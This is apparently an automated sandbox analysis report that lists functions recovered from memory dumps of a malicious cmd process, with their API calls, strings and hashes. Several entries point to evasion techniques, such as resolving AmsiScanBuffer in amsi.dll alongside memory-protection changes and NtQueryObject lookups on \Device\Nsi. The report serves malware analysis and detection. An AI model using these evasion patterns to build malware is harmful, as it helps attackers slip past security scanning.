Function 0000022123C51E3C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 13
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNELBASE ref: 0000022123C51E47
GetProcAddress.KERNEL32 ref: 0000022123C51E57
SleepEx.KERNELBASE ref: 0000022123C51E67

Strings

AmsiScanBuffer, xrefs: 0000022123C51E50
amsi.dll, xrefs: 0000022123C51E40

Memory Dump Source

Source File: 00000012.00000002.3006643268.0000022123C51000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022123C50000, based on PE: true

Associated: 00000012.00000002.3005383829.0000022123C50000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3008097319.0000022123C65000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3009442821.0000022123C70000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3010698681.0000022123C72000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3011903929.0000022123C79000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_22123c50000_cmd.jbxd

Similarity

API ID: AddressLibraryLoadProcSleep
String ID: AmsiScanBuffer$amsi.dll
API String ID: 188063004-3248079830
Opcode ID: 594064a6cd66e1c3961e71c37a52b1967edf4951384bf957dace5d3e1a2af7c1
Instruction ID: dae152e5fd4354b1bbc660f5c912285704649e613bd1fe81fdbfae5a37fe011f
Opcode Fuzzy Hash: 594064a6cd66e1c3961e71c37a52b1967edf4951384bf957dace5d3e1a2af7c1
Instruction Fuzzy Hash: EBD01210611968F9ED086B80F85CB1432217FB4F00FD06217EE0E093A0DE2C98F9AB00

Function 0000022123C53A1C Relevance: 4.5, APIs: 3, Instructions: 39
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameW.KERNEL32 ref: 0000022123C53A35
PathFindFileNameW.SHLWAPI ref: 0000022123C53A44

Part of subcall function 0000022123C53F88: StrCmpNIW.SHLWAPI(?,?,?,0000022123C5272F), ref: 0000022123C53FA0

Part of subcall function 0000022123C53EC8: GetModuleHandleW.KERNEL32(?,?,?,?,?,0000022123C53A5B), ref: 0000022123C53EDB
Part of subcall function 0000022123C53EC8: GetCurrentProcess.KERNEL32(?,?,?,?,?,0000022123C53A5B), ref: 0000022123C53F0E
Part of subcall function 0000022123C53EC8: VirtualProtectEx.KERNEL32(?,?,?,?,?,0000022123C53A5B), ref: 0000022123C53F2E
Part of subcall function 0000022123C53EC8: GetCurrentProcess.KERNEL32(?,?,?,?,?,0000022123C53A5B), ref: 0000022123C53F47
Part of subcall function 0000022123C53EC8: VirtualProtectEx.KERNEL32(?,?,?,?,?,0000022123C53A5B), ref: 0000022123C53F68

CreateThread.KERNELBASE ref: 0000022123C53A8B

Part of subcall function 0000022123C51E74: GetCurrentThread.KERNEL32 ref: 0000022123C51E7F
Part of subcall function 0000022123C51E74: CreateThread.KERNELBASE ref: 0000022123C52043
Part of subcall function 0000022123C51E74: TlsAlloc.KERNEL32 ref: 0000022123C52049
Part of subcall function 0000022123C51E74: TlsAlloc.KERNEL32 ref: 0000022123C52055
Part of subcall function 0000022123C51E74: TlsAlloc.KERNEL32 ref: 0000022123C52061
Part of subcall function 0000022123C51E74: TlsAlloc.KERNEL32 ref: 0000022123C5206D
Part of subcall function 0000022123C51E74: TlsAlloc.KERNEL32 ref: 0000022123C52079
Part of subcall function 0000022123C51E74: TlsAlloc.KERNEL32 ref: 0000022123C52085

Memory Dump Source

Source File: 00000012.00000002.3006643268.0000022123C51000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022123C50000, based on PE: true

Associated: 00000012.00000002.3005383829.0000022123C50000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3008097319.0000022123C65000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3009442821.0000022123C70000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3010698681.0000022123C72000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3011903929.0000022123C79000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_22123c50000_cmd.jbxd

Similarity

API ID: Alloc$CurrentThread$CreateFileModuleNameProcessProtectVirtual$FindHandlePath
String ID:
API String ID: 2779030803-0
Opcode ID: 6a579ca0c7c2c8c467e4d6158b23fada6777a03145598802ad2919fe2a24b2e1
Instruction ID: 9afe7dbe84c22df07181eb58609c32dc443d26191db3144eb0e261d68297424e
Opcode Fuzzy Hash: 6a579ca0c7c2c8c467e4d6158b23fada6777a03145598802ad2919fe2a24b2e1
Instruction Fuzzy Hash: 6C119E21610669F2FB6497E0B54EF9922A4A7B4345F50332BBD06AD2D4EF78C4F88600

Function 0000022123C5F598 Relevance: 3.1, APIs: 2, Instructions: 71
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetStdHandle.KERNEL32 ref: 0000022123C5F611
GetFileType.KERNELBASE ref: 0000022123C5F627

Memory Dump Source

Source File: 00000012.00000002.3006643268.0000022123C51000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022123C50000, based on PE: true

Associated: 00000012.00000002.3005383829.0000022123C50000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3008097319.0000022123C65000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3009442821.0000022123C70000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3010698681.0000022123C72000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3011903929.0000022123C79000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_22123c50000_cmd.jbxd

Similarity

API ID: FileHandleType
String ID:
API String ID: 3000768030-0
Opcode ID: d8bdb561d8588ff3a06e22568a35befa5f6db2390d5457c7351101905abceb47
Instruction ID: b40b4d39ec617a94c087d09c6644a6bfcc24f78ceb86c5855f7a4c3c416d6ba0
Opcode Fuzzy Hash: d8bdb561d8588ff3a06e22568a35befa5f6db2390d5457c7351101905abceb47
Instruction Fuzzy Hash: A231A422611B68E1E7688B54A5886692750F355BB0F64230BEF6A2B3F0CF35D4F1D340

Function 0000022123C2F598 Relevance: 3.1, APIs: 2, Instructions: 71
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetStdHandle.KERNEL32 ref: 0000022123C2F611
GetFileType.KERNELBASE ref: 0000022123C2F627

Memory Dump Source

Source File: 00000012.00000002.2998588852.0000022123C21000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022123C20000, based on PE: true

Associated: 00000012.00000002.2997162745.0000022123C20000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3000130252.0000022123C35000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3001424297.0000022123C40000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3002716570.0000022123C42000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3004035150.0000022123C49000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_22123c20000_cmd.jbxd

Similarity

API ID: FileHandleType
String ID:
API String ID: 3000768030-0
Opcode ID: d8bdb561d8588ff3a06e22568a35befa5f6db2390d5457c7351101905abceb47
Instruction ID: 3de1cc5741ad37d279f176a96636c9a890bfb73d9e13f69283e405435f72816b
Opcode Fuzzy Hash: d8bdb561d8588ff3a06e22568a35befa5f6db2390d5457c7351101905abceb47
Instruction Fuzzy Hash: 4B31A222610B6CE1EB608B5495886692750F365BB0F68230BEF6E1B3F0CB35D4F1C340

Function 0000022123BF2EBC Relevance: 1.7, APIs: 1, Instructions: 240libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE ref: 0000022123BF302E

Memory Dump Source

Source File: 00000012.00000003.2617452152.0000022123BF0000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000022123BF0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_3_22123bf0000_cmd.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: da5dba7eb06952aa6345e7caa7b696f440210d15dc911575dfa97e0e60fe5b6d
Instruction ID: 4fa13dde39c51f2829a8bf19444e7840ead8db3fef6e6b244b3441b202a92755
Opcode Fuzzy Hash: da5dba7eb06952aa6345e7caa7b696f440210d15dc911575dfa97e0e60fe5b6d
Instruction Fuzzy Hash: 8F913672B01260D7EB70AF65D408F6DB391FB64B94F549221BE4D0BB88DB3AD922C710

Function 0000022123BC2EBC Relevance: 1.7, APIs: 1, Instructions: 240libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE ref: 0000022123BC302E

Memory Dump Source

Source File: 00000012.00000003.2617455752.0000022123BC0000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000022123BC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_3_22123bc0000_cmd.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: da5dba7eb06952aa6345e7caa7b696f440210d15dc911575dfa97e0e60fe5b6d
Instruction ID: 6b1e686705f46a1d720cf31a05dae39898c5bade451add285d356073603c9162
Opcode Fuzzy Hash: da5dba7eb06952aa6345e7caa7b696f440210d15dc911575dfa97e0e60fe5b6d
Instruction Fuzzy Hash: EF910472B01260DFDB74AF65D408F69B391FB64B98F948624EE4D4B788DB39D822C704

Function 0000022123C51BC4 Relevance: 1.6, APIs: 1, Instructions: 68
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0000022123C51724: GetProcessHeap.KERNEL32 ref: 0000022123C5172F
Part of subcall function 0000022123C51724: HeapAlloc.KERNEL32 ref: 0000022123C5173E
Part of subcall function 0000022123C51724: RegOpenKeyExW.ADVAPI32 ref: 0000022123C517AE
Part of subcall function 0000022123C51724: RegOpenKeyExW.ADVAPI32 ref: 0000022123C517DB
Part of subcall function 0000022123C51724: RegCloseKey.ADVAPI32 ref: 0000022123C517F5
Part of subcall function 0000022123C51724: RegOpenKeyExW.ADVAPI32 ref: 0000022123C51815
Part of subcall function 0000022123C51724: RegCloseKey.ADVAPI32 ref: 0000022123C51830
Part of subcall function 0000022123C51724: RegOpenKeyExW.ADVAPI32 ref: 0000022123C51850
Part of subcall function 0000022123C51724: RegCloseKey.ADVAPI32 ref: 0000022123C5186B
Part of subcall function 0000022123C51724: RegOpenKeyExW.ADVAPI32 ref: 0000022123C5188B
Part of subcall function 0000022123C51724: RegCloseKey.ADVAPI32 ref: 0000022123C518A6
Part of subcall function 0000022123C51724: RegOpenKeyExW.ADVAPI32 ref: 0000022123C518C6

SleepEx.KERNELBASE ref: 0000022123C51BDF

Part of subcall function 0000022123C51724: RegCloseKey.ADVAPI32 ref: 0000022123C518E1
Part of subcall function 0000022123C51724: RegOpenKeyExW.ADVAPI32 ref: 0000022123C51901
Part of subcall function 0000022123C51724: RegCloseKey.ADVAPI32 ref: 0000022123C5191C
Part of subcall function 0000022123C51724: RegOpenKeyExW.ADVAPI32 ref: 0000022123C5193C
Part of subcall function 0000022123C51724: RegCloseKey.ADVAPI32 ref: 0000022123C51957
Part of subcall function 0000022123C51724: RegOpenKeyExW.ADVAPI32 ref: 0000022123C51977
Part of subcall function 0000022123C51724: RegCloseKey.ADVAPI32 ref: 0000022123C51992
Part of subcall function 0000022123C51724: RegCloseKey.ADVAPI32 ref: 0000022123C5199C

Memory Dump Source

Source File: 00000012.00000002.3006643268.0000022123C51000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022123C50000, based on PE: true

Associated: 00000012.00000002.3005383829.0000022123C50000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3008097319.0000022123C65000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3009442821.0000022123C70000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3010698681.0000022123C72000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3011903929.0000022123C79000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_22123c50000_cmd.jbxd

Similarity

API ID: CloseOpen$Heap$AllocProcessSleep
String ID:
API String ID: 948135145-0
Opcode ID: 04a7d6bb1a63501d3af889adb59d0fd65c45e2a3bb55e477ac55990fbc3a1c41
Instruction ID: 576c6261b53837ba7c8e002b3ddbd63acdeddd97c626ba3f03c39bae375af7a1
Opcode Fuzzy Hash: 04a7d6bb1a63501d3af889adb59d0fd65c45e2a3bb55e477ac55990fbc3a1c41
Instruction Fuzzy Hash: E2314855300529E1FF509BA6E54EB693394E764BC0F147613BE0A9F3D5DF21E4F28204

Non-executed Functions

Function 0000022123C52FF0 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 256
stringlibraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNEL32 ref: 0000022123C53094
lstrlenW.KERNEL32 ref: 0000022123C532BE

Part of subcall function 0000022123C51A30: OpenProcess.KERNEL32 ref: 0000022123C51A56
Part of subcall function 0000022123C51A30: K32GetModuleFileNameExW.KERNEL32 ref: 0000022123C51A74
Part of subcall function 0000022123C51A30: PathFindFileNameW.SHLWAPI ref: 0000022123C51A83
Part of subcall function 0000022123C51A30: lstrlenW.KERNEL32 ref: 0000022123C51A8F
Part of subcall function 0000022123C51A30: StrCpyW.SHLWAPI ref: 0000022123C51AA2
Part of subcall function 0000022123C51A30: CloseHandle.KERNEL32 ref: 0000022123C51AB0

GetProcAddress.KERNEL32 ref: 0000022123C530A9

Part of subcall function 0000022123C53F88: StrCmpNIW.SHLWAPI(?,?,?,0000022123C5272F), ref: 0000022123C53FA0

StrCmpNIW.SHLWAPI ref: 0000022123C530EC
lstrlenW.KERNEL32 ref: 0000022123C53214

Strings

ntdll.dll, xrefs: 0000022123C5308D
NtQueryObject, xrefs: 0000022123C5309F
\Device\Nsi, xrefs: 0000022123C530DF

Memory Dump Source

Source File: 00000012.00000002.3006643268.0000022123C51000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022123C50000, based on PE: true

Associated: 00000012.00000002.3005383829.0000022123C50000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3008097319.0000022123C65000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3009442821.0000022123C70000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3010698681.0000022123C72000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3011903929.0000022123C79000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_22123c50000_cmd.jbxd

Similarity

API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
String ID: NtQueryObject$\Device\Nsi$ntdll.dll
API String ID: 2119608203-3850299575
Opcode ID: 4d584b0e9fffbad4cc31b9baeef7d8a5c9f9b6ed13c09f6337f8d347bcf38d45
Instruction ID: a18aa74cae5886aeceaa30cc55195881e5d3070e60fb2de0e7c0b7e17b368858
Opcode Fuzzy Hash: 4d584b0e9fffbad4cc31b9baeef7d8a5c9f9b6ed13c09f6337f8d347bcf38d45
Instruction Fuzzy Hash: D5B1D632210AA8E6EB558FA5E808B59A3A4F764B84F046217FE096B7D5DF35CCF0C740

Function 0000022123C22FF0 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 256
stringlibraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNEL32 ref: 0000022123C23094
lstrlenW.KERNEL32 ref: 0000022123C232BE

Part of subcall function 0000022123C21A30: OpenProcess.KERNEL32 ref: 0000022123C21A56
Part of subcall function 0000022123C21A30: K32GetModuleFileNameExW.KERNEL32 ref: 0000022123C21A74
Part of subcall function 0000022123C21A30: PathFindFileNameW.SHLWAPI ref: 0000022123C21A83
Part of subcall function 0000022123C21A30: lstrlenW.KERNEL32 ref: 0000022123C21A8F
Part of subcall function 0000022123C21A30: StrCpyW.SHLWAPI ref: 0000022123C21AA2
Part of subcall function 0000022123C21A30: CloseHandle.KERNEL32 ref: 0000022123C21AB0

GetProcAddress.KERNEL32 ref: 0000022123C230A9

Part of subcall function 0000022123C23F88: StrCmpNIW.SHLWAPI(?,?,?,0000022123C2272F), ref: 0000022123C23FA0

StrCmpNIW.SHLWAPI ref: 0000022123C230EC
lstrlenW.KERNEL32 ref: 0000022123C23214

Strings

\Device\Nsi, xrefs: 0000022123C230DF
ntdll.dll, xrefs: 0000022123C2308D
NtQueryObject, xrefs: 0000022123C2309F

Memory Dump Source

Source File: 00000012.00000002.2998588852.0000022123C21000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022123C20000, based on PE: true

Associated: 00000012.00000002.2997162745.0000022123C20000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3000130252.0000022123C35000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3001424297.0000022123C40000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3002716570.0000022123C42000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3004035150.0000022123C49000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_22123c20000_cmd.jbxd

Similarity

API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
String ID: NtQueryObject$\Device\Nsi$ntdll.dll
API String ID: 2119608203-3850299575
Opcode ID: 4d584b0e9fffbad4cc31b9baeef7d8a5c9f9b6ed13c09f6337f8d347bcf38d45
Instruction ID: 232669d6e809adb8fb814049d847be6062c34bf6ba52a12da793003f0d465d9f
Opcode Fuzzy Hash: 4d584b0e9fffbad4cc31b9baeef7d8a5c9f9b6ed13c09f6337f8d347bcf38d45
Instruction Fuzzy Hash: ADB19D622106A8E2EB648FA5D408FA9A3A4F764B94F046217FE0D5BB95DF35CDF1C340

Function 0000022123C584B0 Relevance: 10.6, APIs: 7, Instructions: 71COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32 ref: 0000022123C584CC
RtlCaptureContext.NTDLL ref: 0000022123C584F9
RtlLookupFunctionEntry.NTDLL ref: 0000022123C58513
RtlVirtualUnwind.NTDLL ref: 0000022123C58554
IsDebuggerPresent.KERNEL32 ref: 0000022123C585A8
SetUnhandledExceptionFilter.KERNEL32 ref: 0000022123C585C5
UnhandledExceptionFilter.KERNEL32 ref: 0000022123C585D0

Memory Dump Source

Source File: 00000012.00000002.3006643268.0000022123C51000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022123C50000, based on PE: true

Associated: 00000012.00000002.3005383829.0000022123C50000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3008097319.0000022123C65000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3009442821.0000022123C70000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3010698681.0000022123C72000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3011903929.0000022123C79000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_22123c50000_cmd.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
String ID:
API String ID: 3140674995-0
Opcode ID: 51ce79795580dd11982ca28bc6e50e7f34313ca15137cb51b6721156f23fd73c
Instruction ID: a95adb12e2d275a0b984cea36dbe99b456b81b2075c91b20b339c3c885174cd8
Opcode Fuzzy Hash: 51ce79795580dd11982ca28bc6e50e7f34313ca15137cb51b6721156f23fd73c
Instruction Fuzzy Hash: E5315872304B94DAEB608FA0E844BA97360F794704F44512AEB4E5BB98DF38C1A8CB10

Function 0000022123C284B0 Relevance: 10.6, APIs: 7, Instructions: 71COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32 ref: 0000022123C284CC
RtlCaptureContext.NTDLL ref: 0000022123C284F9
RtlLookupFunctionEntry.NTDLL ref: 0000022123C28513
RtlVirtualUnwind.NTDLL ref: 0000022123C28554
IsDebuggerPresent.KERNEL32 ref: 0000022123C285A8
SetUnhandledExceptionFilter.KERNEL32 ref: 0000022123C285C5
UnhandledExceptionFilter.KERNEL32 ref: 0000022123C285D0

Memory Dump Source

Source File: 00000012.00000002.2998588852.0000022123C21000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022123C20000, based on PE: true

Associated: 00000012.00000002.2997162745.0000022123C20000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3000130252.0000022123C35000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3001424297.0000022123C40000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3002716570.0000022123C42000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3004035150.0000022123C49000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_22123c20000_cmd.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
String ID:
API String ID: 3140674995-0
Opcode ID: 51ce79795580dd11982ca28bc6e50e7f34313ca15137cb51b6721156f23fd73c
Instruction ID: 73af25dfa3e8db10434555439d54d086f523961cd669686fbaef97be494a4e52
Opcode Fuzzy Hash: 51ce79795580dd11982ca28bc6e50e7f34313ca15137cb51b6721156f23fd73c
Instruction Fuzzy Hash: 3F317072204B94DAEB609FA0E854BED7360F794744F44512AEE4D4BB98DF38C6A8C710

Function 0000022123C235C8 Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 93memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(?,?,?,?,?,0000022123C224D1), ref: 0000022123C235EB
HeapAlloc.KERNEL32(?,?,?,?,?,0000022123C224D1), ref: 0000022123C235FE
StrCmpNIW.SHLWAPI(?,?,?,?,?,0000022123C224D1), ref: 0000022123C23673
GetProcessHeap.KERNEL32(?,?,?,?,?,0000022123C224D1), ref: 0000022123C236D9
HeapFree.KERNEL32(?,?,?,?,?,0000022123C224D1), ref: 0000022123C236E7

Strings

$rbx-, xrefs: 0000022123C2366C

Memory Dump Source

Source File: 00000012.00000002.2998588852.0000022123C21000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022123C20000, based on PE: true

Associated: 00000012.00000002.2997162745.0000022123C20000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3000130252.0000022123C35000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3001424297.0000022123C40000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3002716570.0000022123C42000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3004035150.0000022123C49000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_22123c20000_cmd.jbxd

Similarity

API ID: Heap$Process$AllocFree
String ID: $rbx-
API String ID: 756756679-3661604363
Opcode ID: cf694f0bea780c6e1211edc3f081aa45b4316966585fdcbda0fb213a5a03d4f8
Instruction ID: 308f741e1d9cba3fd2dab1443d122594ade13ae7b280522bee04cb7252c88487
Opcode Fuzzy Hash: cf694f0bea780c6e1211edc3f081aa45b4316966585fdcbda0fb213a5a03d4f8
Instruction Fuzzy Hash: 3431A521701B69E3EB95DF96D548B6973A4FB64B84F085222AF4C0BB55EF34C4F18700

Function 0000022123C5CD80 Relevance: 9.1, APIs: 6, Instructions: 86COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlCaptureContext.NTDLL ref: 0000022123C5CE0B
RtlLookupFunctionEntry.NTDLL ref: 0000022123C5CE23
RtlVirtualUnwind.NTDLL ref: 0000022123C5CE5E
IsDebuggerPresent.KERNEL32 ref: 0000022123C5CE97
SetUnhandledExceptionFilter.KERNEL32 ref: 0000022123C5CEA1
UnhandledExceptionFilter.KERNEL32 ref: 0000022123C5CEAC

Memory Dump Source

Source File: 00000012.00000002.3006643268.0000022123C51000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022123C50000, based on PE: true

Associated: 00000012.00000002.3005383829.0000022123C50000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3008097319.0000022123C65000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3009442821.0000022123C70000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3010698681.0000022123C72000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3011903929.0000022123C79000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_22123c50000_cmd.jbxd

Similarity

API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
String ID:
API String ID: 1239891234-0
Opcode ID: 76c33bf84c009b7db417edaf83874ce51c27584cf70d0f0be3d694c1c6751581
Instruction ID: 1039c1b6ff24bfcd974d56b812665a69e0c4eb42814af022acc386f1ce192b4e
Opcode Fuzzy Hash: 76c33bf84c009b7db417edaf83874ce51c27584cf70d0f0be3d694c1c6751581
Instruction Fuzzy Hash: 68418B32214B94DAEB60CB64E84479E73A4F798764F501226EE8D4AB98DF38C1A5CB00

Function 0000022123C2CD80 Relevance: 9.1, APIs: 6, Instructions: 86COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlCaptureContext.NTDLL ref: 0000022123C2CE0B
RtlLookupFunctionEntry.NTDLL ref: 0000022123C2CE23
RtlVirtualUnwind.NTDLL ref: 0000022123C2CE5E
IsDebuggerPresent.KERNEL32 ref: 0000022123C2CE97
SetUnhandledExceptionFilter.KERNEL32 ref: 0000022123C2CEA1
UnhandledExceptionFilter.KERNEL32 ref: 0000022123C2CEAC

Memory Dump Source

Source File: 00000012.00000002.2998588852.0000022123C21000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022123C20000, based on PE: true

Associated: 00000012.00000002.2997162745.0000022123C20000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3000130252.0000022123C35000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3001424297.0000022123C40000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3002716570.0000022123C42000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3004035150.0000022123C49000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_22123c20000_cmd.jbxd

Similarity

API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
String ID:
API String ID: 1239891234-0
Opcode ID: 76c33bf84c009b7db417edaf83874ce51c27584cf70d0f0be3d694c1c6751581
Instruction ID: 21663d3c4c90719c54680f52ffc4336ccc1d03847aebfe372946bd96ea7e540a
Opcode Fuzzy Hash: 76c33bf84c009b7db417edaf83874ce51c27584cf70d0f0be3d694c1c6751581
Instruction Fuzzy Hash: A0417C32214B94D6EB60CF64E844B9E73A4F798754F501226EE8D4BB98DF38C2A5CB00

Function 0000022123C21E3C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 13librarysleeploaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32 ref: 0000022123C21E47
GetProcAddress.KERNEL32 ref: 0000022123C21E57
Sleep.KERNEL32 ref: 0000022123C21E67

Strings

AmsiScanBuffer, xrefs: 0000022123C21E50
amsi.dll, xrefs: 0000022123C21E40

Memory Dump Source

Source File: 00000012.00000002.2998588852.0000022123C21000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022123C20000, based on PE: true

Associated: 00000012.00000002.2997162745.0000022123C20000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3000130252.0000022123C35000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3001424297.0000022123C40000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3002716570.0000022123C42000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3004035150.0000022123C49000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_22123c20000_cmd.jbxd

Similarity

API ID: AddressLibraryLoadProcSleep
String ID: AmsiScanBuffer$amsi.dll
API String ID: 188063004-3248079830
Opcode ID: 594064a6cd66e1c3961e71c37a52b1967edf4951384bf957dace5d3e1a2af7c1
Instruction ID: fa110740dc6d63eb47a52e77fcbc4bc1fcbae9fff45dec494ebf32867464c6bb
Opcode Fuzzy Hash: 594064a6cd66e1c3961e71c37a52b1967edf4951384bf957dace5d3e1a2af7c1
Instruction Fuzzy Hash: 32D06724611668F5EA096B91EC9CB983261BB74F01FC46617ED0E0A3A0DE2D8AF99340

Function 0000022123C5DA18 Relevance: 6.2, APIs: 4, Instructions: 240fileCOMMON

Download Yara Rule

APIs

